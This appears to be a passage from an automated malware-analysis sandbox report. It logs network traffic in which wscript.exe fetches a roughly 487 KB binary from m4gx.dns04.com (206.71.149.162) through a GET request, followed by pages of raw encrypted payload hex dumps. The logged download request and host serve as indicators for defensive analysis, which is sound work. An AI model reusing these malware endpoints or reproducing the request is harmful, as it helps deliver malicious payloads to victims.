                                                                                                    2023-10-24 04:55:31 UTC4537INData Raw: ff 79 99 8a d0 71 65 ae 1a 5f ad d4 2b b7 fd db dd ae c9 43 70 c6 51 55 1f c9 95 af 08 1f 1f a8 04 6a 56 70 49 d3 fb a8 a1 10 ac 46 48 98 4a 44 52 c3 2a 60 df 1b 18 fb 69 2b bc ec b0 0a 12 ed ac 98 ef de 19 c5 1e fa 63 c9 6e ab d7 7c 3c e5 bc 66 42 c6 90 25 54 61 2d 07 49 ac 09 0d f8 04 39 03 98 a4 37 1d 35 29 16 0d ba 83 50 e1 07 0f 61 cf 9d c7 6a 1e a9 2c 38 b4 95 27 13 af 4c 7d fb 40 fa c0 3d 5f 39 39 9d fc 97 0f 55 2c c5 8e 6c d9 33 63 64 6e 23 cc 49 f8 05 36 ae c4 86 42 79 3f 2c 1f 71 75 7f cd 21 83 6f 10 04 b9 5f c3 45 2b 05 dc 33 78 df 0e 2e 42 77 5f b2 af 96 eb a2 98 c8 67 2b d1 22 6f 98 b8 8e 96 4e bd 12 dc 26 aa a6 55 59 2a 3c 0f 44 5f 2e 0d 87 d0 b0 86 8a 8e 77 b2 8c af 2e d8 11 5d 88 b4 69 d5 30 cc 8b da 9a e6 04 84 96 2b 2d 86 e4 23 f3 1b ff
                                                                                                    Data Ascii: yqe_+CpQUjVpIFHJDR*`i+cn|<fB%Ta-I975)Paj,8'L}@=_99U,l3cdn#I6By?,qu!o_E+3x.Bw_g+"oN&UY*<D_.w.]i0+-#
                                                                                                    2023-10-24 04:55:31 UTC4545INData Raw: 55 42 16 c5 01 73 4f c6 ce cd a0 ff 09 2a 6d da 1d f7 4a 00 5c 30 bc b9 67 4e a3 e1 26 d8 d8 5d 82 bc de 0e 03 f2 34 ec 29 f4 4a bd dd 77 a8 10 80 fb 5a 7c b9 93 aa 01 ec 18 0d fc 48 b9 3a 18 47 7d 8a 1b 35 2f 70 82 62 f3 0e bb 37 c8 21 d7 53 ab 8c 41 97 c6 67 33 44 e5 2a 28 6d a4 f0 4d 64 f2 8f 15 f5 1a 08 1b 76 dc 21 35 ac d1 10 04 bb 2c 5a aa fb 8b 33 92 48 9e e0 33 fe 16 6d e2 6e f2 f0 bc 66 f2 2f cc 3c 15 31 a2 2d a4 79 a2 a6 31 8d ea 97 b7 75 73 45 a9 6e 47 07 cb 4a 7b 57 9f 89 29 1c c0 d3 9e cf ef 15 42 a1 89 35 85 66 16 c0 b3 33 31 9a 57 43 c2 7a a6 4b eb 6c 05 92 33 c5 6e 8b 79 47 54 ff f7 af a3 b1 da b3 45 07 c8 18 92 75 02 ee 73 9d 18 37 01 07 3b e9 ae fe f8 25 58 2d 42 d0 6a 4d 33 4c e4 19 79 8d 31 a5 7b 75 82 19 d9 7b 60 92 b3 62 ac 10 a4 49
                                                                                                    Data Ascii: UBsO*mJ\0gN&]4)JwZ|H:G}5/pb7!SAg3D*(mMdv!5,Z3H3mnf/<1-y1usEnGJ{W)B5f31WCzKl3nyGTEus7;%X-BjM3Ly1{u{`bI


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    5192.168.2.449743206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:35 UTC4549OUTGET /lp1aa3.dfhyhgf HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: en-ch
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:35 UTC4549INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 24 Oct 2023 04:55:35 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Last-Modified: Tue, 29 Aug 2023 16:24:27 GMT
                                                                                                    ETag: "76e51-604123ea7d6a6"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 486993
                                                                                                    Connection: close
                                                                                                    2023-10-24 04:55:35 UTC4549INData Raw: 3c 8c 88 41 43 54 41 42 4b 4c 45 74 ba 71 94 59 88 dd ca 28 b2 43 3d 96 b3 4e 41 47 43 44 45 a8 ad 6f a0 73 2d ff d0 a3 99 91 37 3e bd c7 fa 02 98 4b 34 d4 8d d2 97 d4 a4 93 9d 8f d3 52 29 e6 c0 72 44 d8 2b 64 77 5f 66 9e a4 84 14 dd 2c d0 1f 42 c7 1b 58 25 b9 5e f8 11 0f b2 18 08 e7 3d 1b b0 fe 2f b3 e9 9f 6d 45 a2 fd d6 6c de 5a e2 d2 2b 19 2e e2 e3 05 66 62 c9 f5 fd 26 b9 2f c2 fd 23 42 3a bb 3d ff 4f 7f 39 1f b7 14 27 b0 1c dd f7 34 de 76 c9 fc ab cf 0a d1 64 0a 32 2b fe 69 71 85 04 9e ce 35 41 40 db af ce e1 1f 96 fc 72 9e bd c1 0d 43 94 74 d7 a6 bf b2 28 20 ef b7 d4 e4 6e 9e 33 12 80 8f 33 b4 5d 3b ed 7b 5f be 33 65 c4 36 da b5 e6 6f 4a 7e db c2 34 bf 26 b7 f2 cb 14 61 bb ac 16 19 74 62 64 4d f6 07 0d 1c 1b 2e a4 85 36 3f 75 98 50 80 38 58 74 94 5c
                                                                                                    Data Ascii: <ACTABKLEtqY(C=NAGCDEos-7>K4R)rD+dw_f,BX%^=/mElZ+.fb&/#B:=O9'4vd2+iq5A@rCt( n33];{_3e6oJ~4&atbdM.6?uP8Xt\
                                                                                                    2023-10-24 04:55:36 UTC4557INData Raw: 13 53 97 8d 89 a5 84 7f 8c 4e 12 66 2f 46 e7 98 2f c2 fd 43 21 8e 15 d7 3b b1 38 3c 1f 92 9f 6d 6f 49 bf bd 5e 08 13 60 4e 04 97 cb ce 62 7b f6 68 4f 76 c8 a1 f8 2a bc dd 9d 61 cf 65 6e d7 13 77 ab 76 88 b5 4d e5 18 c4 3e 0b 79 3d 41 00 73 85 0c f4 08 24 1c aa d0 a7 0f f7 d5 98 98 35 80 9c db ac 93 a8 25 d9 68 b8 ab e8 97 79 b9 9c 5c ed 50 d1 35 af 24 b7 f2 42 ca 43 2c fa 65 68 8f 4a a9 86 4d d7 82 ac 3e 30 10 e0 3e 86 ce 49 46 ab a9 74 20 44 0e af 6d 4e df 7f fb 8c 60 10 3c 62 d4 94 02 a9 1e f7 b0 42 bb 18 e9 c2 93 1b 47 47 29 7b 89 80 d2 36 1d a9 4e 40 9a 4f b3 5f 91 e9 1f 63 80 1f 55 d0 f8 e0 d5 7d a8 b8 27 3c 42 8a 7f 0a 4f bf 02 26 4a 0d 0f 02 a1 a5 42 a8 e6 ac a1 e3 29 47 1e 1f 12 a2 9e b3 14 b6 ca 59 af 87 48 a0 65 30 16 a7 8b 80 0c 44 00 f6 cf 17
                                                                                                    Data Ascii: SNf/F/C!;8<moI^`Nb{hOv*aenwvM>y=As$5%hy\P5$BC,ehJM>0>IFt DmN`<bBGG){6N@O_cU}'<BO&JB)GYHe0D
                                                                                                    2023-10-24 04:55:36 UTC4565INData Raw: d1 c0 24 ba 15 e4 ae 99 14 57 55 04 fd 06 e5 b9 a0 c6 a0 6a 79 de 9e 38 82 88 e0 db b4 bf aa 22 56 98 81 7f de 08 58 3c 19 4d 11 27 9e e2 5e 13 76 28 fc 2c 03 00 98 07 1a 31 f5 31 2b 38 82 bf cf 72 c0 07 94 dc 70 77 d0 7e eb 4d 97 7e 76 39 f3 8f 66 09 e1 2e 09 91 34 76 41 11 26 b9 45 fa 0e 8b 5b 35 7d 9b af a7 f6 71 ad 73 89 8a 77 96 22 c1 5d 93 19 a6 34 56 9e bc b5 69 b3 8e af ac ab 75 50 89 e0 76 0a 47 31 13 c4 5e 4e 40 4c eb fb 2d 97 53 35 04 7c 1b 94 6e 22 ce ec 15 2f d1 14 67 5c 65 c2 86 ef 90 9f c7 3b cd 60 26 16 76 fb 95 40 d7 ee 60 73 50 9f 03 72 79 ad 01 6a 68 02 46 09 b1 10 45 c9 b9 84 42 3f 6a d3 55 b1 98 ce 1f d2 8b 1a ef 26 2d 07 47 73 6b f2 19 1f 60 2c f5 fc 23 83 60 fd 38 09 01 bf 4d d6 bb 35 50 62 df 3c d6 0b eb 83 af 21 a1 cf e3 10 66 3d
                                                                                                    Data Ascii: $WUjy8"VX<M'^v(,11+8rpw~M~v9f.4vA&E[5}qsw"]4ViuPvG1^N@L-S5|n"/g\e;`&v@`sPryjhFEB?jU&-Gsk`,#`8M5Pb<!f=
                                                                                                    2023-10-24 04:55:36 UTC4573INData Raw: f3 87 54 b6 b8 a7 73 70 80 67 a8 71 c3 fe 46 f0 38 d8 9b 0b 1e 46 08 ab 36 d3 27 84 53 b1 05 5f 62 c6 b7 5c 98 5a 2a b3 9d 6c 74 30 ba fb f1 fb d6 b6 e9 54 cd a4 d1 3b bf 6c cb 02 8b 9c 56 f4 4a 59 d8 57 87 db a4 b4 72 fd b0 eb cc 50 20 e1 69 aa 22 ae ea 5f d2 d7 2a 8a 48 57 c3 da 9e 89 d8 7e 48 0c e3 cd c3 b0 4c f3 49 7a 02 b4 52 93 d1 5f 42 69 38 71 06 ef 38 ac cd 3d cf dd ea 50 20 ff 69 a9 2e c8 28 14 44 46 82 6c db 1f 40 29 45 e5 ac 75 a8 aa 95 bc 02 4e 93 da 45 a8 a6 2c c6 bf 8c a6 5b 52 a6 b5 b2 c2 c6 93 c2 68 c1 9c 20 4a 48 ac 92 dd 21 4a 11 0c 0f 96 32 1d b4 20 09 8e e0 20 29 15 07 71 70 b8 c3 e0 ac fa 4a 17 0c 01 78 dc 04 21 b3 02 0e ef c8 f5 e5 60 a3 47 0b 91 ef 99 3b b2 67 7d a3 de 69 d3 66 bb 33 07 de 77 25 79 c9 3d d2 2a 76 4a 61 69 49 0e 94
                                                                                                    Data Ascii: TspgqF8F6'S_b\Z*lt0T;lVJYWrP i"_*HW~HLIzR_Bi8q8=P i.(DFl@)EuNE,[Rh JH!J2 )qpJx!`G;g}if3w%y=*vJaiI
                                                                                                    2023-10-24 04:55:36 UTC4580INData Raw: b9 ba f5 96 95 26 e8 58 e6 61 f6 1b b4 88 54 fa ec 53 ca 6b 95 9c ac f3 51 f9 92 cb 7d 02 78 4c 92 c5 17 4b 92 43 9a b5 51 8e 57 93 bd 7a 1a 20 82 70 07 fa 0b 58 39 e2 0e 52 b5 d0 72 12 43 37 b4 cc ed a1 af 85 02 e8 0c a4 6f fc e8 2e 8f a1 e3 6a be ae 22 4f 2e 40 3f 0c 44 be c2 fd 9f cb fd 73 26 68 0f 32 f1 b2 c5 be ce 52 55 03 59 fc 5e 11 8e 09 2e f9 c1 75 dd d7 3b 14 0a fc f0 a3 69 e0 17 41 de 35 bc 74 36 47 bb 7f c8 1d 36 11 e7 6e 00 27 dc 11 fa 3e 68 1a a0 dc 3c 66 9b d4 d6 91 fe f3 8d 89 b3 ce 91 cd 2e a0 10 f5 04 c5 85 16 e5 5e 8d aa 3e 18 19 e0 ea 10 88 8e 95 cd 5e d0 18 57 4e 76 82 6f 27 8c 18 44 b4 ac f3 b8 07 13 c1 77 9a 26 6a 4c 96 d9 65 12 f4 1a 37 de 01 14 c2 4a bb c9 e5 15 51 fa c0 31 23 e7 13 dc 9e 8c 61 39 a1 6e 28 68 9d ac 9f bf 60 f0 6b
                                                                                                    Data Ascii: &XaTSkQ}xLKCQWz pX9RrC7o.j"O.@?Ds&h2RUY^.u;iA5t6G6n'>h<f.^>^WNvo'Dw&jLe7JQ1#a9n(h`k
                                                                                                    2023-10-24 04:55:36 UTC4588INData Raw: 35 db f2 a5 50 ce b2 93 5c 49 bb 88 5c 98 dd 34 79 0f d7 b9 a3 29 56 e3 ec 0d 27 4e ce dd e1 9b b9 93 2e b8 0c f4 06 fd 51 0b 70 43 38 15 7f e3 02 75 76 99 a7 e2 c1 13 8e d2 b6 00 b4 78 6c 80 5f 22 63 bd 31 a5 aa 38 77 2a 13 28 f8 9e 0d fd 2f e6 89 17 ce 5f a1 37 f2 4b ef 0d 51 a7 ca 08 ae 6d c5 6e 0f 4d 83 03 49 ff 74 f2 fe b0 ba 7b b5 a1 76 65 63 70 b4 6a f4 12 95 40 ac 55 6d 9c 26 26 0f 14 55 f6 75 fd 00 d1 06 ef 95 e6 69 00 44 25 4a 28 cc d4 ba f4 25 52 f3 58 1f d7 9f f4 36 a5 e9 fe 0e 3a 63 7a 60 13 1d 99 0b 0c 29 4a 6e ce c3 76 e9 97 af 68 bd 85 74 a7 dd 4b 93 4b 8d a2 98 40 4b 66 ac f1 c8 a2 3f c3 86 37 23 d8 68 82 04 20 9d 01 94 68 2c 66 c6 f6 af ff 74 6e fa e0 8a a8 1f a7 f7 a4 c8 1b 9c 17 a4 39 8e 93 1a 30 80 22 23 e1 b4 42 1f b0 f0 b3 21 ea 39
                                                                                                    Data Ascii: 5P\I\4y)V'N.QpC8uvxl_"c18w*(/_7KQmnMIt{vecpj@Um&&UuiD%J(%RX6:cz`)JnvhtKK@Kf?7#h h,ftn90"#B!9
                                                                                                    2023-10-24 04:55:36 UTC4596INData Raw: 68 d3 c5 93 56 d6 4d 57 a3 86 71 2d bd c5 63 6d 27 d6 67 68 ac 14 8b 8b 3d ec e9 60 90 7f f1 a0 34 25 4b d6 54 f1 db 5f 7d b1 6e 56 98 68 6e 65 5b d3 c1 6d 92 d2 95 1c 06 75 41 e7 c3 ba c0 ce 63 c2 b6 e9 53 93 62 69 ea 5f d8 c6 52 66 85 7b ab 4a a8 e9 5c ae 38 6d bf f2 c7 ab ec ea 79 c5 f9 17 16 27 8f d0 8f 1a f5 5c c7 30 0d 8c ad 36 fe 24 1d 6b ef 9b ef 71 9f 57 2d e2 c5 50 06 4a ad 88 85 e1 af db 64 0c dd f4 cb c9 71 44 73 a7 86 ea 5a a0 c3 2a b0 aa ad 1c 14 c0 32 a1 2b d2 5b 87 6e 99 ea 6c 1c 8d 48 20 78 6a 1a cb 82 ae 87 4e 9d b9 dc d4 53 71 17 cf f0 64 62 07 21 da 63 6c 38 ec 9a 62 a6 85 e4 a0 14 57 67 d7 65 af 46 d0 46 35 69 59 af 02 fd 36 81 53 89 8a cb d0 8d ba cf 51 e1 42 b5 cc 3c d5 4d 6c 14 ad bf 92 c9 eb a0 96 f8 84 af a8 85 eb c1 44 a2 2d 5c
                                                                                                    Data Ascii: hVMWq-cm'gh=`4%KT_}nVhne[muAcSbi_Rf{J\8my'\06$kqW-PJdqDsZ*2+[nlH xjNSqdb!cl8bWgeFF5iY6SQB<MlD-\
                                                                                                    2023-10-24 04:55:36 UTC4604INData Raw: fe 00 c5 66 03 7a dd 27 04 80 9c bb 66 09 92 08 7a 81 91 e8 7f 12 57 8a dc e8 70 84 63 aa 6c 37 68 bb 93 bf 5e ce 6c ec 7d 91 c6 e4 cd d8 e7 34 c6 c0 d3 00 67 32 1b 02 47 06 d0 02 30 53 b2 32 ce ee 5b 91 a0 81 a9 55 65 4a 7e 10 a8 37 63 e6 ee 8c 14 fe fb 9d 61 96 81 f3 6d d0 39 0b 45 6d 1d b2 42 27 df d4 31 86 f5 5f 2f 57 5c 4f e3 87 9d bd 88 39 ce 26 f4 91 71 e0 61 c5 f3 97 ab 38 41 28 cd 8b fa f4 08 a5 91 10 f5 e2 03 98 61 25 1b 6d 4a d5 c3 ab 24 11 a4 46 2d 1c 6e ca dc 6a f3 9c 5e e4 df 4f 6a ba ef 8e b9 76 10 84 56 56 54 77 07 25 8d 52 15 89 4f 35 cf a7 ef e6 53 c1 e5 1c d3 78 4a 85 c4 33 d7 2b e0 82 10 83 12 2d 50 af 0c 57 26 55 98 fc 95 46 f3 86 80 ca 6a 67 1f 81 db 7d b2 6e e3 82 5d 6c 88 3d 6a 61 12 74 e3 86 82 ac a4 b7 3d f3 67 4b 8f 07 5a 14 67
                                                                                                    Data Ascii: fz'fzWpcl7h^l}4g2G0S2[UeJ~7cam9EmB'1_/W\O9&qa8A(a%mJ$F-nj^OjvVVTw%RO5SxJ3+-PW&UFjg}n]l=jat=gKZg
                                                                                                    2023-10-24 04:55:36 UTC4612INData Raw: a6 5e 0b a5 69 ae 53 8e 64 bf 09 31 a5 3b 69 32 83 54 e4 d8 6f da 09 75 4a b6 ac 64 5a 26 23 82 fa 48 20 7a 4e 2b e1 94 b7 70 5b 8c 88 45 81 7d 06 23 fa 95 20 64 35 02 7e e8 fc 40 3c 04 38 ef 80 2f 14 17 f0 48 f9 1c 92 f6 37 34 37 82 94 c0 50 fd d5 30 6b ff 3c 6a fe 36 67 77 c3 5b 5d 8a 76 9b f9 2d 4a 38 80 17 60 2c 07 93 de 7c 24 4e e7 db 2d 4e bc ec 12 92 de b6 80 72 0a 92 84 72 19 22 fe 46 40 e9 26 a6 b5 0c f7 93 35 65 e9 45 fc d5 9f 8a 82 ac 23 1e 04 55 b4 e0 d3 14 c6 8b a5 3e bb 48 da e4 ea 38 ae 99 eb 56 69 5a d0 4a 4f 82 65 82 c5 5c 00 c8 a4 5b 54 c2 4b a1 41 59 1b 72 e7 c3 c5 4a 4f a5 b0 a8 28 76 29 e0 79 90 bc 13 80 91 6a 91 4b 1b 8c ef a5 81 8a 4e 15 23 dd 5c f2 f9 39 b4 2c 80 9e 4c ec 88 97 e5 e1 7c 84 ca 43 5d c0 9b 21 ea da 1c 9e 9b e8 cf fb
                                                                                                    Data Ascii: ^iSd1;i2TouJdZ&#H zN+p[E}# d5~@<8/H747P0k<j6gw[]v-J8`,|$N-Nrr"F@&5eE#U>H8ViZJOe\[TKAYrJO(v)yjKN#\9,L|C]!
                                                                                                    2023-10-24 04:55:36 UTC4619INData Raw: cb 1b 02 0e 34 40 b9 6e 4d a7 1b 4c 8f 3c 6b a5 5b 7e 0e 10 f6 e7 34 ed 03 e3 d8 8a df 70 d6 42 fb 7e b5 5b c2 0f 25 c0 ad e9 97 8d a2 ee a7 37 20 73 2c 6d 36 f5 76 3e dd 25 99 4e d3 06 bf 8e 58 25 2b 3e a4 2c 63 ab bc d5 3b 49 28 9f e4 a0 9e 5b 4d 93 13 06 13 4c 4c 0f 2b 6f 6b 14 b2 98 dc 74 11 63 8d bd 0d 93 f7 d5 b3 ee 0f d3 1b be 35 f2 b4 2f ca 57 c5 6a 24 ed 16 ac 63 7e 5e 12 5d f1 0d 49 20 f3 49 fd f8 a7 1d 90 15 60 3a 0f 7f cb fb 22 fa 3f bd c7 29 79 25 bb 33 4c 66 5b d8 0f 20 73 08 0b d2 26 0e 92 78 8e 18 b8 3e 2a 9a a7 cd 04 01 fe 97 fc 00 3e 85 a0 7d 6d 05 88 fd 83 bf ed 84 28 aa a3 2e 39 f6 5b 32 17 1a cf 93 ab 71 ca a6 75 40 6c c6 6a b2 0a 83 55 eb 9d cf f0 6b e1 92 23 8d 2d 7b d6 53 f8 15 c9 cd 35 67 ff a0 2d 21 af 29 3a 21 1b 40 9d 3a b9 7d
                                                                                                    Data Ascii: 4@nML<k[~4pB~[%7 s,m6v>%NX%+>,c;I([MLL+oktc5/Wj$c~^]I I`:"?)y%3Lf[ s&x>*>}m(.9[2qu@ljUk#-{S5g-!):!@:}
                                                                                                    2023-10-24 04:55:36 UTC4627INData Raw: 0e f1 90 87 28 a1 7f c2 20 ef 20 14 c6 ae d4 d7 e2 a3 ca e8 ee 3f e3 8e b6 9d 42 81 de 5d c7 ee a2 d6 a1 90 c3 ac 0b f8 9b 26 2c e9 04 f1 bc 0d 52 aa ea 9b 28 28 ef 1a 9f c8 b8 27 be f6 5e cb b0 66 d8 97 34 32 4a c1 ad b1 02 78 6f cc da 62 66 1a 47 ae 3e a6 04 f0 5a a7 be d8 e7 1a 31 3a ca 18 fd fe 86 c4 97 16 e1 17 0c 15 5f 45 18 42 05 b2 e1 e9 26 00 d5 f4 49 1f ea 05 18 ec c8 74 72 58 4f a5 e5 d9 3a 4a 09 54 1b 5d 83 28 25 df ed b6 8d b8 70 b0 7f 4b 7c b5 44 1f c2 0c ed 9d 0b 8b 60 49 02 c0 64 77 9d 34 ea 91 99 30 ba be 0d 69 f7 04 c8 ee 22 88 2c 33 07 29 c3 b9 4e 50 db 42 e4 62 55 e4 28 0e 23 18 5c 42 e5 f8 53 14 97 aa fc 22 cf 66 7d 1c 88 4f b8 e3 70 c1 ad 6d dd bc 09 72 4d b9 45 a3 ad 1d 1a e2 ac 4c cf bd 01 98 e1 cd 45 e5 cd b0 78 3d 88 10 67 f8 7e
                                                                                                    Data Ascii: ( ?B]&,R(('^f42JxobfG>Z1:_EB&ItrXO:JT](%pK|D`Idw40i",3)NPBbU(#\BS"f}OpmrMELEx=g~
                                                                                                    2023-10-24 04:55:36 UTC4635INData Raw: f7 54 bc 25 05 17 28 fe dc c9 4a 07 0e c3 be 9c 8c 78 02 8c e0 86 a3 80 5c cc e9 64 ec c6 c3 21 8e d1 95 c7 4c ff 2b ce 41 5e 5b f8 52 06 3b ec 8b b4 e9 1c 5e c3 1f c5 e6 e8 b8 db 69 ff 6f 54 3d 97 df 7a 48 01 e5 22 21 4e eb 83 83 90 46 bf d0 5e 06 b1 00 53 86 94 9c f8 b3 88 a0 fc 17 7f 5b 76 4e 1c a7 fb a2 76 16 54 dc 35 cb c9 04 1e a2 ad 27 d6 79 31 a3 2d 17 15 f5 d1 78 08 bc ed 34 37 b9 43 a6 47 17 5e 28 8c a8 ca c1 74 ca a0 4e ea e6 86 00 47 5b ee 9f 84 46 b1 5d 54 1e 5b 11 f8 de 2e da a1 6c 2e 7a 9c 0c eb 0a 30 91 a9 33 9a 59 a5 b5 81 a9 4b 78 6e c0 a0 b4 b5 83 df 71 c0 45 20 93 5d 7c 4b a3 c6 6a 81 08 18 4e 2e 90 8a dc 90 bf 34 4f 87 7f f0 04 72 87 89 6d 36 10 dc 17 94 59 49 bc 1e 00 a2 46 51 f8 03 ff bc 59 49 dc 56 50 17 3e 85 4c 8d c9 4b 40 b0 9f
                                                                                                    Data Ascii: T%(Jx\d!L+A^[R;^ioT=zH"!NF^S[vNvT5'y1-x47CG^(tNG[F]T[.l.z03YKxnqE ]|KjN.4Orm6YIFQYIVP>LK@
                                                                                                    2023-10-24 04:55:36 UTC4643INData Raw: f5 01 6a fd 58 98 97 6d 33 4a 7c 42 9d 9f b6 a0 01 18 2c 85 34 ed f5 2b fe ca 98 4e 0e b4 e7 11 81 39 05 8c 28 d8 51 86 49 25 65 24 6c 0a 75 24 04 3d 39 53 35 c6 67 80 da b9 df 2c 47 24 27 01 22 cc 3c 1a 9f c4 df 89 9e fa 9a 0e c8 17 e1 2c 01 df 3c 07 d7 fe 87 89 8a 0a 6d c1 0d 5c ad 1e 3e d6 92 6e df 6e 64 eb e3 9c 02 6f ee 9d 9f 82 b0 a8 6c 43 9d 5f 33 c5 c2 e8 23 39 ce 1a bd 68 fa 97 e4 f3 1c 63 8d 90 64 a4 55 ca 7e 02 40 45 c1 3c f2 85 ce 4c c2 44 0d ae 3d 93 c4 35 8c bd 38 17 3c cd 57 62 fb ba 13 7b a1 37 f1 81 5d 00 9e 24 47 e2 ba 8b a6 f9 6a d1 28 86 74 cd 5b 12 b2 60 81 d3 4b 95 b4 bc 59 16 3e 81 3f 3b 64 3a 38 7d 04 bf 84 5b 30 9b 99 7e d0 d0 ad 01 19 b9 ff ea a2 d8 e5 c9 29 a9 a7 2c 57 2a 13 fd 80 68 65 e1 d0 ff c8 9b 94 14 7d 32 3a cb 6d a2 a5
                                                                                                    Data Ascii: jXm3J|B,4+N9(QI%e$lu$=9S5g,G$'"<,<m\>nndolC_3#9hcdU~@E<LD=58<Wb{7]$Gj(t[`KY>?;d:8}[0~),W*he}2:m
                                                                                                    2023-10-24 04:55:36 UTC4651INData Raw: 01 08 dd 5e b9 48 70 c8 e1 0b 8f a8 0a 7e 2e 4c db 77 96 d4 29 d5 3d 80 86 c5 8c 85 32 27 bd 71 c6 9b 5b 95 d5 2a f9 57 8f c2 1b 3b 1d 7b 6c 16 18 55 1f db 07 3d 09 a5 60 f5 a9 df 75 74 ac 9e ea 01 fb 91 7a 07 d5 0c 7f 78 fc a4 52 f9 cb ff f9 bf 70 eb 55 70 1a 45 a5 9f 48 e3 e6 0c 77 92 61 e9 61 cb c8 d2 dd 01 cc 5e 50 b4 f3 4e f4 85 d0 61 40 22 46 77 6d 6d 7e e0 92 3c 14 45 5e da 1a 36 12 b9 5d d4 eb 8b e8 0a 82 3b 7e f4 d3 06 4f 17 81 df bd 61 d2 5b 8a 64 13 ef dc 74 0a 03 63 67 54 6e 6e 2d bb 47 24 11 e9 f2 cb 7f 3c 0e 6a 23 66 67 c3 8a 8b 4c 8a 9c 8d 2d 17 94 35 64 64 f3 83 0d 6c 6e 74 2a c8 1e 34 6d be ea 69 5e 40 02 45 7e a1 bd ce 0d 8a 06 b9 d2 5d 2a 96 87 8d 59 e3 bb df 64 57 64 fe 56 1b 74 ed e0 dd 85 04 62 26 c1 2b 2e 2b ef 72 f8 ee de 50 eb 4e
                                                                                                    Data Ascii: ^Hp~.Lw)=2'q[*W;{lU=`utzxRpUpEHwaa^PNa@"Fwmm~<E^6];~Oa[dtcgTnn-G$<j#fgL-5ddlnt*4mi^@E~]*YdWdVtb&+.+rPN
                                                                                                    2023-10-24 04:55:36 UTC4659INData Raw: 1e 55 fd 0a 87 b5 01 c3 67 16 47 a4 66 9d 1e 88 48 85 a9 2b de a8 01 e2 9f 39 0c ea ae 63 85 bb a1 4a a7 b2 8a bc 00 ad e4 50 12 f2 e2 ff 81 34 73 3c 7b 54 bd cf 94 58 f3 12 58 11 7f 74 bf 7c 6d 5e 84 c9 df 6f 19 3d 5a 4d 67 84 90 e4 77 44 7c 41 c8 60 d0 d4 51 94 90 75 cd 2c 37 96 8d 6f 53 ac 9f 43 11 fa f7 8c 17 15 43 a9 51 b2 d3 76 8d 02 e2 d6 a1 94 b7 70 7d 4c 13 96 cd c2 ee b0 a0 80 1b 48 5b 99 6f 91 07 13 0e 36 57 65 57 61 46 ca e6 c7 81 f1 df 41 99 14 57 de 2b 92 4d 34 8e d6 03 74 34 dc 11 5b c3 67 e1 d5 15 bf 5e e1 a4 f5 49 ef c9 f0 1c 89 fe 80 b2 e8 24 6f cf bb c4 0d 24 85 37 7b 90 15 a3 a8 73 92 20 37 56 f6 b0 db 09 b5 26 13 a7 9c 71 41 56 d3 c0 57 97 c5 eb 43 94 71 41 fd ff 21 d3 ec 39 bf bf 5d 22 07 22 f1 d5 1f 66 ad 0f e7 26 48 61 1b 98 be cf
                                                                                                    Data Ascii: UgGfH+9cJP4s<{TXXt|m^o=ZMgwD|A`Qu,7oSCCQvp}LH[o6WeWaFAW+M4t4[g^I$o$7{s 7V&qAVWCqA!9]""f&Ha
                                                                                                    2023-10-24 04:55:36 UTC4666INData Raw: 07 0b 15 03 89 34 70 10 c6 ae 77 89 18 95 f5 40 a3 13 fe 63 4b 35 e9 b7 f0 d7 61 b4 c7 38 0e ca b1 d5 df e8 26 65 19 87 b1 46 63 48 f5 47 c7 24 e6 0e de 9f 9f f0 16 97 10 f7 cf 94 ab 18 9d ba 18 b0 72 97 38 42 7f db ee a3 ae b5 be 2a 61 8d 7b 55 b6 12 b8 d1 d8 90 e8 1e b1 dc c5 cd c6 ff 74 46 eb 5b 00 a5 94 b2 00 37 ec 91 b0 83 71 9a 96 31 b4 6b 1e e5 74 4e b1 c6 ef e0 a4 12 dd 46 28 9a 7d f4 b2 4e 3e 05 c7 d5 7a 8c 7a f9 d2 93 40 fb de c6 e9 ba a7 03 98 0a 4b ad 49 b1 e1 63 e4 91 8b 21 e6 5b a8 df 07 c2 d4 a4 bb 62 a4 4f 4a 55 27 74 a9 5e 8b a1 cd 6d 7a df e0 2a 13 e2 5a af e6 f0 aa 1b 82 a5 87 29 0b 63 ce 14 e7 65 85 7d c5 de 5a e1 34 0b 7c 9c 59 22 24 67 12 15 09 83 43 58 b2 ed c4 26 28 e1 e5 de 6b aa 4a f7 b6 61 d5 2f 19 72 fc c2 35 22 4e 31 17 dd 47
                                                                                                    Data Ascii: 4pw@cK5a8&eFcHG$r8B*a{UtF[7q1ktNF(}N>zz@KIc![bOJU't^mz*Z)ce}Z4|Y"$gCX&(kJa/r5"N1G
                                                                                                    2023-10-24 04:55:36 UTC4674INData Raw: b0 43 8e cb a0 70 68 93 e1 c1 ed 42 96 0c fb 78 d3 d7 e0 d2 94 59 44 be 78 06 28 eb 8d 3f a6 91 01 04 3c 35 a1 6e 4e 67 b3 32 81 fe d3 12 e9 a7 bd 3f ff 79 21 5a d1 6f 0c 02 a4 01 7a 4e 43 7d 13 ce 22 d6 e3 a1 28 f3 62 84 3d f4 78 65 b4 86 01 4c 76 63 9d e8 a1 37 39 ef 33 59 d9 32 da 15 92 d7 8b d9 90 19 50 3d 20 a1 bd b2 37 08 92 3c 23 9a 17 01 fd f3 a2 71 21 36 9e bb bc ab 4c 2a 1d 23 5c 8b c0 67 2a cb fd c1 f3 6a cb 89 af e3 8c 06 bd 84 8e 9c cd 49 b1 7d 8e 8e 06 39 77 bb a6 bb c3 e4 6c 04 1e c5 49 26 77 f1 44 f9 01 4e cf 6f b5 e9 8f a5 a7 ba 01 c7 f9 5b 91 4c 89 18 0f 50 ab f5 39 cc c1 b8 44 00 b9 6e b9 62 79 83 13 b1 c3 4e 30 5f ea c7 4c 5d 8d 9e 92 33 10 ce 2a 93 08 38 cd 1e cc 8b 33 80 f2 90 52 46 a5 b8 cf 12 cf fc 54 1b e7 ed 8a 14 32 68 9e c7 b7
